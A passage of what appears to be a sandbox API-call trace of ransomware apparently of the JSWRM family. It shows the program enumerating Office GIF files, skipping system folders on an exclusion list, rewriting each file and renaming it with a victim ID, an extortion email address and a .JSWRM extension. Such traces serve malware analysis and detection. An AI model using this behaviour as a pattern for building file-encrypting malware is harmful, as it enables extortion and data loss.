MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0118.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0118.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.608] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir10f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR10F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir10f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0118.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0118.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0118.609] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x142f, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR11F.GIF", cAlternateFileName="")) returned 1 [0118.609] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2=".") returned 1 [0118.609] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="..") returned 1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="...") returned 1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="windows") returned -1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="recovery") returned -1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="perflogs") returned -1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="documents and settings") returned 1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="system volume information") returned -1 [0118.610] lstrcmpiW (lpString1="PDIR11F.GIF", lpString2="msocache") returned 1 [0118.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR11F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR11F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR11F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0118.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR11F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR11F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR11F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0118.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0118.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir11f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.611] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5167) returned 1 [0118.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1420) returned 0x24c1d0 [0118.611] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1420, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1420, lpOverlapped=0x0) returned 1 [0118.614] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.614] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1420, lpOverlapped=0x0) returned 1 [0118.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.614] CloseHandle (hObject=0x314) returned 1 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0118.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0118.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0118.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0118.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0118.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0118.615] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir11f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR11F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir11f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0118.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.616] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46df, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR12F.GIF", cAlternateFileName="")) returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2=".") returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="..") returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="...") returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="windows") returned -1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="recovery") returned -1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="perflogs") returned -1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="documents and settings") returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="system volume information") returned -1 [0118.616] lstrcmpiW (lpString1="PDIR12F.GIF", lpString2="msocache") returned 1 [0118.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0118.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR12F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR12F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR12F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0118.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0118.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR12F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR12F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR12F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0118.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0118.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir12f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.617] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18143) returned 1 [0118.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46d0) returned 0x24c1d0 [0118.617] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x46d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x46d0, lpOverlapped=0x0) returned 1 [0118.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.677] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x46d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x46d0, lpOverlapped=0x0) returned 1 [0118.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.677] CloseHandle (hObject=0x314) returned 1 [0118.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0118.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0118.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0118.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0118.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0118.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0118.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir12f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR12F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir12f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0118.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0118.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.680] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x430d, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR13F.GIF", cAlternateFileName="")) returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2=".") returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="..") returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="...") returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="windows") returned -1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="recovery") returned -1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="perflogs") returned -1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="documents and settings") returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="system volume information") returned -1 [0118.680] lstrcmpiW (lpString1="PDIR13F.GIF", lpString2="msocache") returned 1 [0118.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR13F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR13F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR13F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0118.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR13F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR13F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR13F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0118.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir13f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.682] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17165) returned 1 [0118.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4300) returned 0x24c1d0 [0118.682] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x4300, lpOverlapped=0x0) returned 1 [0118.691] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.691] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x4300, lpOverlapped=0x0) returned 1 [0118.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.691] CloseHandle (hObject=0x314) returned 1 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0118.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0118.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.692] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir13f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR13F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir13f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 